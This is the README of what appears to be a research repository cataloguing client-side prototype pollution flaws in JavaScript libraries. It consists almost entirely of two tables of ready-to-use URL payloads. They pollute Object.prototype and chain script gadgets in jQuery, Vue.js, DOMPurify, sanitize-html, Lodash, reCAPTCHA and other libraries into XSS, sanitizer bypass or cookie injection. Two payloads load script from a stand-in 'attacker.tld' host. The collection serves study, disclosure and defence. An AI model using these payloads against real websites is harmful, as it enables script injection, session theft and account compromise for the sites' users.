Client-Side Prototype Pollution


If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.

Prototype Pollution

Name Payload Refs Found by
Wistia Embedded Video (Fixed) ?__proto__[test]=test
[1] William Bowling
jQuery query-object plugin
Sergey Bobrov
jQuery Sparkle
Sergey Bobrov
V4Fire Core Library ?__proto__.test=test
Sergey Bobrov
[1] Sergey Bobrov
jQuery BBQ
Sergey Bobrov
Sergey Bobrov
MooTools More
Sergey Bobrov
Swiftype Site Search (Fixed) #__proto__[test]=test s1r1us
CanJS deparam ?__proto__[test]=test
Rahul Maini
Purl (jQuery-URL-Parser)
Sergey Bobrov
HubSpot Tracking Code (Fixed) ?__proto__[test]=test
Sergey Bobrov
YUI 3 querystring-parse ?constructor[prototype][test]=test Sergey Bobrov
Mutiny ?__proto__.test=test SPQR
jQuery parseParams ?__proto__.test=test
php.js parse_str ?__proto__[test]=test
arg.js ?__proto__[test]=test
davis.js ?__proto__[test]=test POSIX

Script Gadgets

Name Payload Impact Refs Found by
Wistia Embedded Video ?__proto__[innerHTML]=<img/src/onerror=alert(1)> XSS [1] William Bowling
jQuery $.get ?__proto__[context]=<img/src/onerror%3dalert(1)>
XSS Sergey Bobrov
jQuery $.get >= 3.0.0 ?__proto__[url][]=data:,alert(1)//
XSS Michał Bentkowski
jQuery $.get >= 3.0.0 ?__proto__[url]=data:,alert(1)//
XSS Sergey Bobrov
jQuery $.getScript >= 3.4.0 ?__proto__[src][]=data:,alert(1)// XSS s1r1us
jQuery $.getScript 3.0.0 - 3.3.1 ?__proto__[url]=data:,alert(1)// XSS s1r1us
jQuery $(html) ?__proto__[div][0]=1
XSS Sergey Bobrov
jQuery $(x).off ?__proto__[preventDefault]=x
XSS Sergey Bobrov
Google reCAPTCHA ?__proto__[srcdoc][]=<script>alert(1)</script> XSS s1r1us
Twitter Universal Website Tag ?__proto__[hif][]=javascript:alert(1) XSS Sergey Bobrov
Tealium Universal Tag ?__proto__[attrs][src]=1
XSS Sergey Bobrov
Akamai Boomerang ?__proto__[BOOMR]=1
XSS s1r1us
Lodash <= 4.17.15 ?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1) XSS [1] Alex Brasetvik
sanitize-html ?__proto__[*][]=onload Bypass [1] Michał Bentkowski
sanitize-html ?__proto__[innerText]=<script>alert(1)</script> Bypass [1] Hpdoger
js-xss ?__proto__[whiteList][img][0]=onerror
Bypass [1] Michał Bentkowski
DOMPurify <= 2.0.12 ?__proto__[ALLOWED_ATTR][0]=onerror
Bypass [1] Michał Bentkowski
DOMPurify <= 2.0.12 ?__proto__[documentMode]=9 Bypass [1] Michał Bentkowski
Closure ?__proto__[*%20ONERROR]=1
Bypass [1] Michał Bentkowski
Closure ?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)// XSS [1] Michał Bentkowski
Marionette.js / Backbone.js ?__proto__[tagName]=img
XSS Sergey Bobrov
Adobe Dynamic Tag Management ?__proto__[src]=data:,alert(1)// XSS Sergey Bobrov
Swiftype Site Search ?__proto__[xxx]=alert(1) XSS s1r1us
Embedly Cards ?__proto__[onload]=alert(1) XSS Guilherme Keerok
Segment Analytics.js ?__proto__[script][0]=1
XSS Sergey Bobrov
Knockout.js ?__proto__[4]=a':1,[alert(1)]:1,'b
XSS Michał Bentkowski
Zepto.js ?__proto__[onerror]=alert(1) XSS [1] lih3iu
Sprint.js ?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)> XSS [1] lih3iu
Vue.js ?__proto__[v-if]=_c.constructor('alert(1)')() XSS POSIX
Vue.js ?__proto__[attrs][0][name]=src
XSS [1] s1r1us
Vue.js ?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')() XSS [1] r00timentary
Vue.js ?__proto__[data]=a
XSS [1] SuperGuesser
Vue.js ?__proto__[props][][value]=a
XSS [1] st98_
Vue.js ?__proto__[template]=<script>alert(1)</script> XSS [1] huli
Demandbase Tag ?__proto__[Config][SiteOptimization][enabled]=1
@analytics/google-tag-manager ?__proto__[customScriptSrc]=//attacker.tld/xss.js XSS SPQR
i18next ?__proto__[lng]=cimode
Potential XSS Sergey Bobrov
i18next < 19.8.5 ?__proto__[lng]=a
Potential XSS Sergey Bobrov
i18next >= 19.8.5 ?__proto__[lng]=a
Potential XSS Sergey Bobrov
Google Analytics ?__proto__[cookieName]=COOKIE%3DInjection%3B Cookie Injection Sergey Bobrov
Popper.js ?__proto__[arrow][style]=color:red;transition:all%201s


XSS [1] [2] Matheus Vrech
Pendo Agent ?__proto__[dataHost]=attacker.tld/js.js%23 XSS Renwa